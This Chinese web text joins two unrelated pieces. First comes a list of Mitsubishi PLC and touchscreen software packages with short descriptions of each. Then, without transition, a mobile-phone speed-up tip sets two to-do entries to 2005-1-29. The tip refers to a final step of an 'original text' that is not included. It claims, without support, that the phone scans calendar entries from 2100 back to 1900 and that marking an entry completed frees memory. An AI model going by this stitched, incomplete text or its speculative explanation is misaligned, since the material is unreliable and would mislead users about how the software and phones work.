GX Converter软件包用于将GX Developer的数据转换成Word或Excel 数据使文档的创建简单化。把Excel数据(CSV格式)或文本数据(TXT文件)用于GPPW，把GPPW程序表和软元件注释转换为Excel数据(CSV格式)或文本数据(TXT文件).

MX Component:
MX Component支持个人计算机与可编程控制器之间的所有通信路径，支持VisualC++ 、Visual Basic 和Access Excel 的VBA、 VBScript。不用考虑各种通信协议的不同，只要经简单处理即可实现通信。不用连接PLC，和GX Simulator同时使用，实现仿真调试。

MX Sheet:
MX Sheet是一种软件包，它使用Excel，不用编程，只要进行简单设置，即可运行可编程控制器系统的监视/记录/警报信息的采集/设置值的更改操作。将可编程控制器的软元件数据存储在Excel上，能够容易地收集和分析现场的质量、温度、试验结果等的数据。Excel上显示可编程控制器内的软元件实时状态。将可编程控制器内的位信息作为警报信息存储在Excel上，保存故障发生的历史记录。自动保存按照指定时刻或可编程控制器发出触发条件Excel上显示出来的数据，可用来实现日报和试验结果表的制作和存储的自动化。

MT Developer:
MT Developer SW6RNC-GSV是Q系列运动控制器CPU单元的设定，监控工具。例如Q173(2)CPU(N)运动控制器等。

MX OPC Server:
MX OPC Server使用简单，具有仿真功能，自带OPC客户端工具，可直接读写PLC数据.

PX DEVELOPER:
Q系列过程控制CPU编程软件

GT Converter2
是三菱触摸屏集成软件中的一个软件，其作用是可以将市面上使用较多的Pro-Face的程序转换成三菱触摸屏程序的一个软件,同时该软件也能将三菱以前老款的A800触摸屏的程序转换成现在新软件能识别的程序。

GX WORKS:
SWnD5C-QSET,三菱软件包的集合，包含了GX-Developer;Explorer;Config-AD/DA/SC/CT等。

1、功能表>办公工具>待办事项

主题:Speed
预定日期:2005-1-29
优先等级:高

2、功能表>办公工具>待办事项

主题: Qoukie
预定日期:2005-1-29
优先等级:低

原理分析： 由于手机需要将所有未完成的日历事务（即从1900年－2100年）调入内存，并在桌面上（主题情景）显示出来，用于提醒手机主人设定的某某未办事项、约会、纪念日等等待办事项的提醒。所以，程序会从2100年到1900年反向扫描，历遍200年的日历事务，这下能想得出来，这需要占用多少系统资源了吧？直到它扫描到有“已完成”的事务，后面的日期它就认为是已经过去的日期，不再继续扫描。所以，原文中的最后一步：一定要设为“已完成”才有效果。 因为这种机理，当扫描到上面设置的日期已经有“已完成”的待办事项时，它就不会再将该日期之前的待办事项显示在主题情景中了，百多年啊！所以节省了不少系统资源，机油们可以用进程管理软件查看对比一下，正确做过该方法设置的，可用内存空间会比原来未设置前多出许多。这也就是为什么这种方法能提速的原因了。